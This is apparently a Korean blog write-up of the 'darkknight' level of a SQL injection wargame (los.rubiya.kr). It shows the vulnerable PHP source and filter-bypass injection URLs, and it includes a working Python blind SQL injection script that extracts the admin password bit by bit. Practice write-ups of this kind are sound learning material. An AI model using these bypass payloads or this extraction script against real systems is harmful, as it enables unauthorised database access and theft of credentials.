IT보안관의 공부 클라우드

[los]darkkinght 본문

워게임/los

[los]darkkinght

ㅡㅡㅡㅡㄷ 2021. 6. 13. 12:58

query : select id from prob_darkknight where id='guest' and pw='' and no= 

<?php 
  include "./config.php"; 
  login_chk(); 
  $db = dbconnect(); 
  if(preg_match('/prob|_|\.|\(\)/i', $_GET[no])) exit("No Hack ~_~"); 
  if(preg_match('/\'/i', $_GET[pw])) exit("HeHe"); 
  if(preg_match('/\'|substr|ascii|=/i', $_GET[no])) exit("HeHe"); 
  $query = "select id from prob_darkknight where id='guest' and pw='{$_GET[pw]}' and no={$_GET[no]}"; 
  echo "<hr>query : <strong>{$query}</strong><hr><br>"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if($result['id']) echo "<h2>Hello {$result[id]}</h2>"; 
   
  $_GET[pw] = addslashes($_GET[pw]); 
  $query = "select pw from prob_darkknight where id='admin' and pw='{$_GET[pw]}'"; 
  $result = @mysqli_fetch_array(mysqli_query($db,$query)); 
  if(($result['pw']) && ($result['pw'] == $_GET['pw'])) solve("darkknight"); 
  highlight_file(__FILE__); 
?>


1. preg_match no : prob _ . ( )
2. preg_match no : ' substr ascii =
3. preg_match pw : '

코드를 보면 id값이 admin인 pw 값을 구해아함.

https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw='a' and no=1|| 1 like 1 and id like "admin"
'(싱글쿼터)를 "(더블쿼터)로 우회.

https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw='a' and no=1||id like "admin" and length(pw) like 8
pw길이 알아내기

https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php?pw='a' and no=1||id like "admin" and mid(pw,1,1) like 0
substr을 mid 함수로 우회

파이썬코드 

#darkknight BlindSqlInjection

import requests
#from itertools import product

chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789~!@#$%^&*'
pw_list = list()
pw_str = str()
url = 'https://los.rubiya.kr/chall/darkknight_5cfbc71e68e09f1b039a8204d1a81456.php'
cookies = {'PHPSESSID':'7cu8mcoov0uo0qirli9sk9d38j'}
for i in range(1,9):
    pw=str()
    for j in range(1,9):
        param={'pw':"a",
               'no': '1 || 1 like 1 && id like "admin" && mid(lpad(bin(ord(mid(pw,'+str(i)+',1))),8,0),'+str(j)+',1) like "1"'}
        res=requests.get(url,cookies=cookies,params=param,verify=False)
        res_text=res.text
        print(res_text)
        if "Hello admin" in res_text:
            pw=pw+'1'
        else:
            pw=pw+'0'
    pw_list.append(pw)
    print(pw_list)
for a in pw_list:
    b=int('0b'+a,2)
    pw_str= pw_str+chr(b)


print("PW:"+pw_str)
저작자표시 비영리

'워게임 > los' 카테고리의 다른 글

[los]bugbear  (0) 2021.06.23
[los]golem  (0) 2021.06.18
[los]skeleton  (0) 2021.06.08
[los]vampire  (0) 2021.06.01
[los]troll  (0) 2021.05.28
'워게임/los' Related Articles more
Comments